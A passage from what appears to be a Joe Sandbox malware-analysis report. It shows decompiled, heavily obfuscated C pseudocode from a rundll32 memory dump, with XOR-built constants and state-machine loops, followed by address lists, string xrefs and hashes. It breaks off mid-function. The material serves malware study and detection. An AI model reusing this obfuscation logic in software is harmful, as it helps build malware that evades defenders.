				_v1044 = 0;
				_v1168 = 0x4c2;
				_v1168 = _v1168 + 0x4422;
				_v1168 = _v1168 << 0xe;
				_v1168 = _v1168 ^ 0x12390029;
				_v1108 = 0xe6e3;
				_v1108 = _v1108 << 7;
				_v1108 = _v1108 ^ 0x80737181;
				_v1140 = 0x5a14;
				_v1140 = _v1140 + 0xffff6ad9;
				_v1140 = _v1140 + 0x3f04;
				_v1140 = _v1140 ^ 0x000003f3;
				_v1152 = 0xde22;
				_v1056 = 0;
				_t427 = 0x1cf5a099;
				_t387 = 0xc;
				_v1152 = _v1152 / _t387;
				_v1152 = _v1152 + 0x1888;
				_v1152 = _v1152 ^ 0x00005d3c;
				_v1072 = 0x75ae;
				_t388 = 0x55;
				_v1072 = _v1072 * 0x39;
				_v1072 = _v1072 ^ 0x001a1469;
				_v1160 = 0x6360;
				_v1160 = _v1160 << 0xa;
				_v1160 = _v1160 >> 0xe;
				_v1160 = _v1160 ^ 0x00005ec5;
				_v1204 = 0x5583;
				_v1204 = _v1204 ^ 0x85366cb5;
				_v1204 = _v1204 | 0x8d22480f;
				_v1204 = _v1204 + 0xffffa345;
				_v1204 = _v1204 ^ 0x8d362c42;
				_v1076 = 0x4501;
				_v1076 = _v1076 ^ 0x7eb858e4;
				_v1076 = _v1076 ^ 0x7eb84390;
				_v1176 = 0x178a;
				_v1176 = _v1176 >> 0xe;
				_v1176 = _v1176 * 0xb;
				_v1176 = _v1176 ^ 0x00005407;
				_v1196 = 0x1155;
				_v1196 = _v1196 << 0x10;
				_v1196 = _v1196 ^ 0x99db21f3;
				_v1196 = _v1196 << 8;
				_v1196 = _v1196 ^ 0x8e21cf72;
				_v1096 = 0x9447;
				_v1096 = _v1096 + 0xfffff759;
				_v1096 = _v1096 ^ 0x0000f307;
				_v1136 = 0x5f84;
				_v1136 = _v1136 | 0xcddc780f;
				_v1136 = _v1136 >> 5;
				_v1136 = _v1136 ^ 0x066ef8af;
				_v1104 = 0x8d89;
				_v1104 = _v1104 + 0xffff49e8;
				_v1104 = _v1104 ^ 0xffff9178;
				_v1060 = 0xefb9;
				_v1060 = _v1060 + 0xc1e0;
				_v1060 = _v1060 ^ 0x0001802f;
				_v1088 = 0x4e92;
				_v1088 = _v1088 / _t388;
				_v1088 = _v1088 ^ 0x00003d65;
				_v1180 = 0x8957;
				_v1180 = _v1180 ^ 0x92844c79;
				_v1180 = _v1180 >> 0xd;
				_v1180 = _v1180 + 0x6937;
				_v1180 = _v1180 ^ 0x0004ca08;
				_v1188 = 0xa977;
				_v1188 = _v1188 + 0xffff4939;
				_t389 = 0x2a;
				_v1188 = _v1188 / _t389;
				_v1188 = _v1188 + 0xff8b;
				_v1188 = _v1188 ^ 0x06195dc5;
				_v1184 = 0xd80a;
				_v1184 = _v1184 << 0xd;
				_v1184 = _v1184 | 0x4fc46678;
				_v1184 = _v1184 + 0xffff2565;
				_v1184 = _v1184 ^ 0x5fc4ec42;
				_v1144 = 0xea63;
				_v1144 = _v1144 >> 0xa;
				_v1144 = _v1144 + 0xffff7a6a;
				_v1144 = _v1144 ^ 0xffff3b56;
				_v1064 = 0xbe27;
				_v1064 = _v1064 << 0xc;
				_v1064 = _v1064 ^ 0x0be2654a;
				_v1100 = 0x1945;
				_v1100 = _v1100 ^ 0xac55a11c;
				_v1100 = _v1100 ^ 0xac55a0be;
				_v1156 = 0x9792;
				_v1156 = _v1156 << 3;
				_v1156 = _v1156 + 0xffff9949;
				_v1156 = _v1156 ^ 0x00042150;
				_v1124 = 0x4510;
				_v1124 = _v1124 + 0xffff8613;
				_v1124 = _v1124 | 0x934ed599;
				_v1124 = _v1124 ^ 0xffffb057;
				_v1208 = 0xd7d3;
				_t390 = 0x4a;
				_v1208 = _v1208 * 0x29;
				_v1208 = _v1208 << 7;
				_v1208 = _v1208 | 0x9b57b5c9;
				_v1208 = _v1208 ^ 0x9b5f9b7a;
				_v1164 = 0x3cc8;
				_v1164 = _v1164 + 0xffff7a64;
				_v1164 = _v1164 + 0xffff31bf;
				_v1164 = _v1164 ^ 0xfffea90e;
				_v1092 = 0xe652;
				_v1092 = _v1092 << 0xf;
				_v1092 = _v1092 ^ 0x732967ec;
				_v1200 = 0xc0e1;
				_v1200 = _v1200 ^ 0xc04a3a1a;
				_v1200 = _v1200 | 0x7efbebea;
				_v1200 = _v1200 ^ 0xfefb9216;
				_v1192 = 0x2d8c;
				_v1192 = _v1192 >> 7;
				_v1192 = _v1192 ^ 0x302961fe;
				_v1192 = _v1192 << 0xf;
				_v1192 = _v1192 ^ 0xb0d2939c;
				_v1132 = 0xbcbe;
				_v1132 = _v1132 | 0x9a03aa26;
				_v1132 = _v1132 << 4;
				_v1132 = _v1132 ^ 0xa03bfed3;
				_v1068 = 0x5b9d;
				_v1068 = _v1068 / _t390;
				_v1068 = _v1068 ^ 0x00000144;
				_v1172 = 0x2743;
				_v1172 = _v1172 >> 9;
				_v1172 = _v1172 + 0x7fd0;
				_v1172 = _v1172 ^ 0x00002a87;
				_v1116 = 0x6969;
				_t391 = 0x76;
				_v1116 = _v1116 / _t391;
				_v1116 = _v1116 << 0xa;
				_v1116 = _v1116 ^ 0x0003c98c;
				_v1212 = 0xb804;
				_v1212 = _v1212 + 0xffff4ff5;
				_v1212 = _v1212 << 0xd;
				_v1212 = _v1212 + 0x7e88;
				_v1212 = _v1212 ^ 0x00ffdfa3;
				_v1084 = 0x6753;
				_v1084 = _v1084 | 0x97d0336a;
				_v1084 = _v1084 ^ 0x97d00d97;
				_v1148 = 0xef82;
				_v1148 = _v1148 >> 2;
				_v1148 = _v1148 << 2;
				_v1148 = _v1148 ^ 0x0000cb2e;
				_v1112 = 0x5852;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 ^ 0xfa80e3bf;
				_v1112 = _v1112 ^ 0xfa8084b8;
				_v1120 = 0x62fa;
				_v1120 = _v1120 >> 0xa;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 ^ 0x000065d7;
				_t384 = _v1056;
				_v1128 = 0x8139;
				_v1128 = _v1128 + 0xffff21ec;
				_v1128 = _v1128 ^ 0xad93553f;
				_v1128 = _v1128 ^ 0x526c8c2f;
				_v1080 = 0x16f9;
				_v1080 = _v1080 + 0xffffafc8;
				_v1080 = _v1080 ^ 0xffff87da;
				_v1216 = 0xd107;
				_v1216 = _v1216 << 0xa;
				_v1216 = _v1216 >> 0xb;
				_v1216 = _v1216 | 0x40b78e0e;
				_v1216 = _v1216 ^ 0x40b7ee8e;
				while(1) {
					L1:
					_t392 = 0x5c;
					while(1) {
						L2:
						_t365 = 0x201e73d8;
						do {
							L3:
							if(_t427 == 0xb9056ba) {
								_push(_v1176);
								_t366 = E0025889D(0x25c930, _v1076, __eflags);
								_t368 =  *0x25ca2c; // 0x2c8300
								__eflags = _t368 + 0x230;
								_t419 =  *0x25ca2c; // 0x2c8300
								E002429E3(_t419, 0x104, _t366, _v1196, _v1096, _v1136, _t368 + 0x230,  &_v1040, _v1104, _v1060);
								E00252025(_v1088, _t366, _v1180, _v1188);
								_t432 =  &(_t432[0xc]);
								_t427 = 0x176c6394;
								goto L17;
							} else {
								if(_t427 == 0x176c6394) {
									_t385 =  *0x25ca2c; // 0x2c8300
									_t386 = _t385 + 0x230;
									while(1) {
										__eflags =  *_t386 - _t392;
										if(__eflags == 0) {
											break;
										}
										_t386 = _t386 + 2;
										__eflags = _t386;
									}
									_t384 = _t386 + 2;
									_t427 = 0x2c3250cc;
									goto L2;
								} else {
									if(_t427 == 0x1cf5a099) {
										_push(_t392);
										_push(_t392);
										E0024C6C7(_v1152, _v1072,  &_v520, _t392, _v1160, _v1168, _v1204);
										_t432 =  &(_t432[7]);
										_t427 = 0xb9056ba;
										goto L1;
									} else {
										if(_t427 == 0x1e86e44b) {
											E002465A2(_v1052, _v1112, _v1120, _v1128, _v1080);
										} else {
											if(_t427 == _t365) {
												_t376 = E00250ADC( &_v1040, _v1132, _v1068);
												_pop(_t399);
												_t378 = E00241AC6(_v1172, _v1116, 2 + _t376 * 2, _v1052,  &_v1040, _t399, _v1212, _v1084, _v1148, _t384, _v1216);
												_t432 =  &(_t432[9]);
												__eflags = _t378;
												_t427 = 0x1e86e44b;
												_v1056 = 0 | __eflags == 0x00000000;
												while(1) {
													L1:
													_t392 = 0x5c;
													L2:
													_t365 = 0x201e73d8;
													goto L3;
												}
											} else {
												_t440 = _t427 - 0x2c3250cc;
												if(_t427 == 0x2c3250cc) {
													_push(_v1144);
													_t379 = E0025889D(0x25c9d0, _v1184, _t440);
													_pop(_t405);
													E00253EB3(_v1064, _t405, _t379, _v1100, _v1156, 0x25c9d0, _v1124, _v1208, 0x25c9d0, _v1164, 0x25c9d0, _v1140, _v1108,  &_v1052);
													_t427 =  ==  ? 0x201e73d8 : 0x22b0460c;
													E00252025(_v1092, _t379, _v1200, _v1192);
													_t432 =  &(_t432[0xf]);
													L17:
													_t365 = 0x201e73d8;
													_t392 = 0x5c;
												}
												goto L18;
											}
										}
									}
								}
							}
							L21:
							return _v1056;
							L18:
						} while (_t427 != 0x22b0460c);
						goto L21;
					}
				}
			}

0x00246d9f
0x00246da5
0x00246db2
0x00246dbb
0x00246dc3
0x00246dcb
0x00246dd0
0x00246dd8
0x00246de0
0x00246de5
0x00246ded
0x00246df5
0x00246dfd
0x00246e05
0x00246e0d
0x00246e19
0x00246e20
0x00246e2b
0x00246e30
0x00246e36
0x00246e3e
0x00246e46
0x00246e59
0x00246e5a
0x00246e61
0x00246e6c
0x00246e74
0x00246e79
0x00246e7e
0x00246e86
0x00246e8e
0x00246e96
0x00246e9e
0x00246ea6
0x00246eae
0x00246eb9
0x00246ec4
0x00246ecf
0x00246ed7
0x00246ee1
0x00246ee5
0x00246eed
0x00246ef5
0x00246efa
0x00246f02
0x00246f07
0x00246f0f
0x00246f1a
0x00246f25
0x00246f30
0x00246f38
0x00246f40
0x00246f45
0x00246f4d
0x00246f58
0x00246f63
0x00246f6e
0x00246f79
0x00246f84
0x00246f8f
0x00246fa3
0x00246faa
0x00246fb5
0x00246fbd
0x00246fc5
0x00246fca
0x00246fd2
0x00246fda
0x00246fe4
0x00246ff2
0x00246ff7
0x00246ffd
0x00247005
0x0024700d
0x00247015
0x0024701a
0x00247022
0x0024702a
0x00247032
0x0024703a
0x0024703f
0x00247047
0x0024704f
0x0024705a
0x00247062
0x0024706d
0x00247078
0x00247083
0x0024708e
0x00247096
0x0024709b
0x002470a3
0x002470ab
0x002470b3
0x002470bb
0x002470c3
0x002470cb
0x002470d8
0x002470db
0x002470df
0x002470e4
0x002470ec
0x002470f4
0x002470fc
0x00247104
0x0024710c
0x00247114
0x0024711f
0x00247127
0x00247132
0x0024713a
0x00247142
0x0024714a
0x00247152
0x0024715a
0x0024715f
0x00247167
0x0024716c
0x00247174
0x0024717c
0x00247184
0x00247189
0x00247191
0x002471a7
0x002471ae
0x002471b9
0x002471c1
0x002471c6
0x002471ce
0x002471d6
0x002471e2
0x002471e5
0x002471e9
0x002471ee
0x002471f6
0x002471fe
0x0024720b
0x00247210
0x00247218
0x00247220
0x0024722b
0x00247236
0x00247241
0x00247249
0x0024724e
0x00247253
0x0024725b
0x00247263
0x00247268
0x00247270
0x00247278
0x00247280
0x00247285
0x0024728a
0x00247292
0x00247299
0x002472a1
0x002472a9
0x002472b1
0x002472b9
0x002472c4
0x002472cf
0x002472da
0x002472e2
0x002472e7
0x002472ec
0x002472f4
0x002472fc
0x002472fc
0x002472fe
0x002472ff
0x002472ff
0x002472ff
0x00247304
0x00247304
0x0024730a
0x00247487
0x00247497
0x002474bb
0x002474c0
0x002474d5
0x002474e1
0x002474f7
0x002474fc
0x002474ff
0x00000000
0x00247310
0x00247316
0x00247467
0x0024746d
0x00247478
0x00247478
0x0024747b
0x00000000
0x00000000
0x00247475
0x00247475
0x00247475
0x0024747d
0x00247480
0x00000000
0x0024731c
0x00247322
0x00247433
0x00247434
0x00247455
0x0024745a
0x0024745d
0x00000000
0x00247328
0x0024732e
0x00247537
0x00247334
0x00247336
0x002473d6
0x002473db
0x00247413
0x0024741a
0x0024741d
0x0024741f
0x00247427
0x002472fc
0x002472fc
0x002472fe
0x002472ff
0x002472ff
0x00000000
0x002472ff
0x0024733c
0x0024733c
0x0024733e
0x00247344
0x00247351
0x00247356
0x00247392
0x002473b4
0x002473b7
0x002473bc
0x00247504
0x00247506
0x0024750b
0x0024750b
0x00000000
0x0024733e
0x00247336
0x0024732e
0x00247322
0x00247316
0x0024753f
0x00247550
0x0024750c
0x0024750c
0x00000000
0x00247518
0x002472ff

Strings

6oD, xrefs: 00246DA5
7i, xrefs: 00246FCA
c, xrefs: 00247032
C', xrefs: 002471B9
), xrefs: 00246DD0
g)s, xrefs: 00247127
<], xrefs: 00246E3E
Sg, xrefs: 00247220
RX, xrefs: 0024725B
`c, xrefs: 00246E6C
"D, xrefs: 00246DC3

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: "D$)$6oD$7i$<]$C'$RX$Sg$`c$c$g)s
API String ID: 1514166925-3192994148
Opcode ID: f706f7af1e0ac54d2d190e6ea586642b42365784c5eadc4176d70f5ff901145d
Instruction ID: 0e5ef3efb6015174781227ac4c9520966a90a69bde5a69c2091280fde9190ddd
Opcode Fuzzy Hash: f706f7af1e0ac54d2d190e6ea586642b42365784c5eadc4176d70f5ff901145d
Instruction Fuzzy Hash: DF0225725187819FE3A9CF61C84AA5BBBE1FBC5748F10890CF1D9862A0D7B58919CF07

Uniqueness

Uniqueness Score: -1.00%

Function 0024BB3A, Relevance: 14.0, Strings: 11, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0024BB3A(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				char _t284;
				signed int _t317;
				void* _t322;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				intOrPtr _t357;
				signed int* _t360;

				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				_t284 = E0024602B(0);
				_v72 = _t284;
				_t357 = _t284;
				_v176 = 0x3707;
				_t360 =  &(( &_v188)[9]);
				_v176 = _v176 << 3;
				_t322 = 0x3701c77e;
				_t349 = 0x1b;
				_v176 = _v176 * 0x3b;
				_v176 = _v176 ^ 0x9e3c13fc;
				_v176 = _v176 ^ 0x9e596314;
				_v152 = 0x78a7;
				_v152 = _v152 + 0x292e;
				_v152 = _v152 << 3;
				_v152 = _v152 ^ 0x00050e88;
				_v180 = 0xd511;
				_v180 = _v180 ^ 0x1d80f702;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xe181230f;
				_v180 = _v180 ^ 0xe905cae0;
				_v92 = 0xc43e;
				_v92 = _v92 + 0xffff1ae3;
				_v92 = _v92 ^ 0xffffb82c;
				_v104 = 0x4365;
				_v104 = _v104 >> 5;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x000066ec;
				_v172 = 0xf4f1;
				_v172 = _v172 + 0x10b4;
				_v172 = _v172 + 0xffffc378;
				_v172 = _v172 / _t349;
				_v172 = _v172 ^ 0x000074e7;
				_v116 = 0x37b8;
				_v116 = _v116 + 0xffff57e4;
				_v116 = _v116 + 0xb626;
				_v116 = _v116 ^ 0x0000140c;
				_v144 = 0xb795;
				_t350 = 0x49;
				_v144 = _v144 * 0x50;
				_v144 = _v144 / _t350;
				_v144 = _v144 ^ 0x000091bc;
				_v76 = 0x1dd7;
				_t351 = 0x1c;
				_v76 = _v76 * 0x75;
				_v76 = _v76 ^ 0x000d9fef;
				_v108 = 0xced7;
				_v108 = _v108 >> 5;
				_v108 = _v108 / _t351;
				_v108 = _v108 ^ 0x00005a08;
				_v136 = 0x2b88;
				_v136 = _v136 ^ 0x78d809e4;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 ^ 0x0001f73d;
				_v164 = 0x766d;
				_v164 = _v164 >> 1;
				_v164 = _v164 + 0xffffabb8;
				_t352 = 0x72;
				_v164 = _v164 * 0x5c;
				_v164 = _v164 ^ 0xfff6cd9c;
				_v168 = 0x718b;
				_v168 = _v168 ^ 0xcaa0facc;
				_v168 = _v168 ^ 0xed5841e4;
				_t112 =  &_v168; // 0xed5841e4
				_v168 =  *_t112 * 0x1f;
				_v168 = _v168 ^ 0xd720c943;
				_v100 = 0x3093;
				_v100 = _v100 << 8;
				_v100 = _v100 * 0x6e;
				_v100 = _v100 ^ 0x14df3334;
				_v80 = 0xaa77;
				_v80 = _v80 | 0xec49ccd9;
				_v80 = _v80 ^ 0xec49f00b;
				_v184 = 0x6ab1;
				_v184 = _v184 << 0x10;
				_v184 = _v184 + 0x7c9;
				_v184 = _v184 + 0xb8a8;
				_v184 = _v184 ^ 0x6ab1ec4b;
				_v96 = 0xf4af;
				_v96 = _v96 * 0x3a;
				_v96 = _v96 >> 9;
				_v96 = _v96 ^ 0x00007d4d;
				_v188 = 0xb63a;
				_v188 = _v188 ^ 0x365cf355;
				_v188 = _v188 << 2;
				_v188 = _v188 + 0xd6ce;
				_v188 = _v188 ^ 0xd971d569;
				_v120 = 0xab3a;
				_v120 = _v120 * 0x32;
				_v120 = _v120 / _t352;
				_v120 = _v120 ^ 0x00002a91;
				_v156 = 0xadc6;
				_v156 = _v156 >> 9;
				_v156 = _v156 + 0xffff5d43;
				_v156 = _v156 ^ 0xffff767e;
				_v128 = 0x4e26;
				_t353 = 0x54;
				_v128 = _v128 / _t353;
				_v128 = _v128 ^ 0xbd5b2ebf;
				_v128 = _v128 ^ 0xbd5b3d92;
				_v112 = 0x5bd4;
				_v112 = _v112 | 0xfffbefdf;
				_v112 = _v112 ^ 0xfffb9ace;
				_v88 = 0x9c25;
				_v88 = _v88 | 0xd782555b;
				_v88 = _v88 ^ 0xd782aa4a;
				_v140 = 0x1cfa;
				_v140 = _v140 >> 1;
				_t354 = 0x5d;
				_v140 = _v140 / _t354;
				_v140 = _v140 ^ 0x0000306c;
				_v148 = 0xedd7;
				_v148 = _v148 ^ 0xabf54283;
				_t355 = 0x30;
				_v148 = _v148 / _t355;
				_v148 = _v148 ^ 0x03952150;
				_v124 = 0xb354;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 + 0x3a29;
				_v124 = _v124 ^ 0x0000d052;
				_v132 = 0x3532;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 | 0xce8e7aaf;
				_v132 = _v132 ^ 0xce8e32c4;
				_v160 = 0x7409;
				_v160 = _v160 | 0x6d9a42b1;
				_v160 = _v160 + 0xffff6faf;
				_v160 = _v160 >> 2;
				_v160 = _v160 ^ 0x1b6641d5;
				_v84 = 0xb2d5;
				_v84 = _v84 * 0x47;
				_v84 = _v84 ^ 0x0031fe78;
				do {
					while(_t322 != 0x94ffda2) {
						if(_t322 == 0x11e75ef4) {
							_t317 = E00242833(_v180,  &_v72, _v92, _a8, _v104, _v172);
							_t360 =  &(_t360[5]);
							__eflags = _t317;
							if(_t317 != 0) {
								_t322 = 0x94ffda2;
								continue;
							}
						} else {
							if(_t322 == 0x3336903c) {
								E0025337D(_v124, _v72, _v132, _v160, _v84);
							} else {
								if(_t322 != 0x3701c77e) {
									goto L9;
								} else {
									_t322 = 0x11e75ef4;
									continue;
								}
							}
						}
						L12:
						return _t357;
					}
					E002593A8(_v116, _v144, _v76,  &_v68, 0x44, _v108);
					_push(_v164);
					_v68 = 0x44;
					_v60 = E0025889D(0x25c000, _v136, __eflags);
					__eflags = _v152 | _v176;
					_t357 = E00247AB1(_v168, _a16, 0x25c000, 0x25c000, _v152 | _v176, _v100, 0x25c000, 0x25c000, _v80, _v184, _v96, _a28, 0, _a8, _v188, _v120, _v72, _v156, _v128, _v112,  &_v68);
					E00252025(_v88, _v60, _v140, _v148);
					_t360 =  &(_t360[0x1a]);
					_t322 = 0x3336903c;
					L9:
					__eflags = _t322 - 0x294b0e13;
				} while (_t322 != 0x294b0e13);
				goto L12;
			}

0x0024bb44
0x0024bb4d
0x0024bb4e
0x0024bb55
0x0024bb5c
0x0024bb63
0x0024bb6a
0x0024bb6b
0x0024bb6c
0x0024bb6d
0x0024bb72
0x0024bb79
0x0024bb7b
0x0024bb83
0x0024bb86
0x0024bb92
0x0024bb99
0x0024bb9c
0x0024bba0
0x0024bba8
0x0024bbb0
0x0024bbb8
0x0024bbc0
0x0024bbc5
0x0024bbcd
0x0024bbd5
0x0024bbdd
0x0024bbe2
0x0024bbea
0x0024bbf2
0x0024bbfa
0x0024bc02
0x0024bc0a
0x0024bc12
0x0024bc17
0x0024bc1c
0x0024bc24
0x0024bc2c
0x0024bc34
0x0024bc44
0x0024bc48
0x0024bc50
0x0024bc58
0x0024bc60
0x0024bc68
0x0024bc70
0x0024bc7d
0x0024bc80
0x0024bc8c
0x0024bc90
0x0024bc98
0x0024bcab
0x0024bcac
0x0024bcb3
0x0024bcbe
0x0024bcc6
0x0024bcd1
0x0024bcd5
0x0024bcdd
0x0024bce5
0x0024bced
0x0024bcf2
0x0024bcfc
0x0024bd04
0x0024bd08
0x0024bd17
0x0024bd1a
0x0024bd1e
0x0024bd26
0x0024bd2e
0x0024bd36
0x0024bd3e
0x0024bd43
0x0024bd47
0x0024bd4f
0x0024bd57
0x0024bd61
0x0024bd65
0x0024bd6d
0x0024bd78
0x0024bd83
0x0024bd8e
0x0024bd96
0x0024bd9b
0x0024bda3
0x0024bdab
0x0024bdb3
0x0024bdc0
0x0024bdc4
0x0024bdc9
0x0024bdd1
0x0024bdd9
0x0024bde1
0x0024bde6
0x0024bdee
0x0024bdf6
0x0024be03
0x0024be0f
0x0024be13
0x0024be1b
0x0024be23
0x0024be28
0x0024be30
0x0024be38
0x0024be44
0x0024be49
0x0024be4f
0x0024be57
0x0024be5f
0x0024be67
0x0024be6f
0x0024be77
0x0024be7f
0x0024be87
0x0024be8f
0x0024be97
0x0024be9f
0x0024bea4
0x0024beaa
0x0024beb2
0x0024beba
0x0024bec6
0x0024bec9
0x0024bed2
0x0024bedf
0x0024beec
0x0024bef4
0x0024befc
0x0024bf04
0x0024bf0c
0x0024bf11
0x0024bf19
0x0024bf21
0x0024bf29
0x0024bf31
0x0024bf39
0x0024bf3e
0x0024bf46
0x0024bf53
0x0024bf57
0x0024bf5f
0x0024bf5f
0x0024bf65
0x0024bf9e
0x0024bfa3
0x0024bfa6
0x0024bfa8
0x0024bfae
0x00000000
0x0024bfae
0x0024bf67
0x0024bf69
0x0024c0b1
0x0024bf6f
0x0024bf75
0x00000000
0x0024bf7b
0x0024bf7b
0x00000000
0x0024bf7b
0x0024bf75
0x0024bf69
0x0024c0ba
0x0024c0c5
0x0024c0c5
0x0024bfcf
0x0024bfd4
0x0024bfe1
0x0024bff4
0x0024c054
0x0024c06b
0x0024c082
0x0024c087
0x0024c08a
0x0024c08c
0x0024c08c
0x0024c08c
0x00000000

Strings

t, xrefs: 0024BF21
t, xrefs: 0024BC48
tI, xrefs: 0024BC3C
f, xrefs: 0024BC1C
M}, xrefs: 0024BDC9
AX, xrefs: 0024BD3E
):, xrefs: 0024BEF4
D, xrefs: 0024BFE1
25, xrefs: 0024BF04
l0, xrefs: 0024BEAA
.), xrefs: 0024BBB8

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: t$):$.)$25$D$M}$l0$AX$f$t$tI
API String ID: 0-3778435269
Opcode ID: a952abefef2cf525503f7efa4bf58562045c2aae30ce719d2466d18bcb58765e
Instruction ID: ecb4329354276aba937221d9576a14424d2101b85522e0594132a2d80f4ea247
Opcode Fuzzy Hash: a952abefef2cf525503f7efa4bf58562045c2aae30ce719d2466d18bcb58765e
Instruction Fuzzy Hash: 60D102715083819FE368CF65C889A1FFBE1BBC4758F10891DF29A96260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00258F49, Relevance: 12.7, Strings: 10, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00258F49() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t245;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t258;
				void* _t264;
				intOrPtr _t282;
				void* _t286;
				signed int* _t290;

				_t290 =  &_v1144;
				_v1044 = _v1044 & 0x00000000;
				_v1048 = 0x4ebe6;
				_v1128 = 0x778f;
				_v1128 = _v1128 | 0xa1323825;
				_t249 = 0x13;
				_v1128 = _v1128 / _t249;
				_v1128 = _v1128 << 2;
				_t286 = 0x35c963e4;
				_v1128 = _v1128 ^ 0x21ef9208;
				_v1052 = 0x4cd;
				_v1052 = _v1052 | 0x68cff677;
				_v1052 = _v1052 ^ 0x68cf93fd;
				_v1092 = 0x77ae;
				_v1092 = _v1092 >> 0xa;
				_v1092 = _v1092 ^ 0x00005fc7;
				_v1060 = 0x2f45;
				_v1060 = _v1060 | 0xa1a9613d;
				_v1060 = _v1060 ^ 0xa1a96f30;
				_v1096 = 0x6d0d;
				_v1096 = _v1096 << 2;
				_v1096 = _v1096 | 0xf85e23e8;
				_v1096 = _v1096 ^ 0xf85f94d5;
				_v1136 = 0xe906;
				_t250 = 0x4b;
				_v1136 = _v1136 * 0x76;
				_v1136 = _v1136 + 0x8e3a;
				_v1136 = _v1136 << 8;
				_v1136 = _v1136 ^ 0x6bf6f1e6;
				_v1104 = 0x5e2e;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 * 0x2c;
				_v1104 = _v1104 ^ 0x0000496b;
				_v1144 = 0xf2e9;
				_v1144 = _v1144 + 0xd50c;
				_v1144 = _v1144 / _t250;
				_v1144 = _v1144 ^ 0x9fddb036;
				_v1144 = _v1144 ^ 0x9fdde12f;
				_v1108 = 0x6902;
				_v1108 = _v1108 | 0xfbe10d26;
				_v1108 = _v1108 * 0x44;
				_v1108 = _v1108 ^ 0xe7e09cc2;
				_v1120 = 0xf3f1;
				_v1120 = _v1120 + 0xffff8a4f;
				_v1120 = _v1120 >> 6;
				_v1120 = _v1120 * 0x67;
				_v1120 = _v1120 ^ 0x0000b01d;
				_v1088 = 0xb368;
				_v1088 = _v1088 + 0x9734;
				_v1088 = _v1088 ^ 0x00010c20;
				_v1076 = 0x650d;
				_v1076 = _v1076 ^ 0x0544b8d8;
				_v1076 = _v1076 ^ 0x054483f2;
				_v1056 = 0xabff;
				_v1056 = _v1056 ^ 0x935518d0;
				_v1056 = _v1056 ^ 0x9355abf6;
				_v1068 = 0xb772;
				_v1068 = _v1068 << 2;
				_v1068 = _v1068 ^ 0x00028ed1;
				_v1124 = 0xbc7e;
				_v1124 = _v1124 * 0x39;
				_v1124 = _v1124 + 0x3dff;
				_v1124 = _v1124 ^ 0x966a7207;
				_v1124 = _v1124 ^ 0x9640526c;
				_v1132 = 0xba5f;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 << 5;
				_t251 = 0x75;
				_v1132 = _v1132 / _t251;
				_v1132 = _v1132 ^ 0x0197c6fa;
				_v1140 = 0x5fea;
				_t252 = 0x3c;
				_v1140 = _v1140 * 0xa;
				_v1140 = _v1140 * 0x2d;
				_v1140 = _v1140 >> 2;
				_v1140 = _v1140 ^ 0x002a725f;
				_v1100 = 0x79ec;
				_v1100 = _v1100 << 8;
				_v1100 = _v1100 ^ 0x69f808d7;
				_v1100 = _v1100 ^ 0x69818172;
				_v1084 = 0xd5eb;
				_v1084 = _v1084 ^ 0xb139babe;
				_v1084 = _v1084 ^ 0xb1392951;
				_v1072 = 0x4dbe;
				_v1072 = _v1072 ^ 0x00003bef;
				_v1080 = 0x7ef4;
				_v1080 = _v1080 / _t252;
				_v1080 = _v1080 ^ 0x00000c75;
				_v1112 = 0xcb8d;
				_v1112 = _v1112 + 0x5361;
				_v1112 = _v1112 + 0xffffff0c;
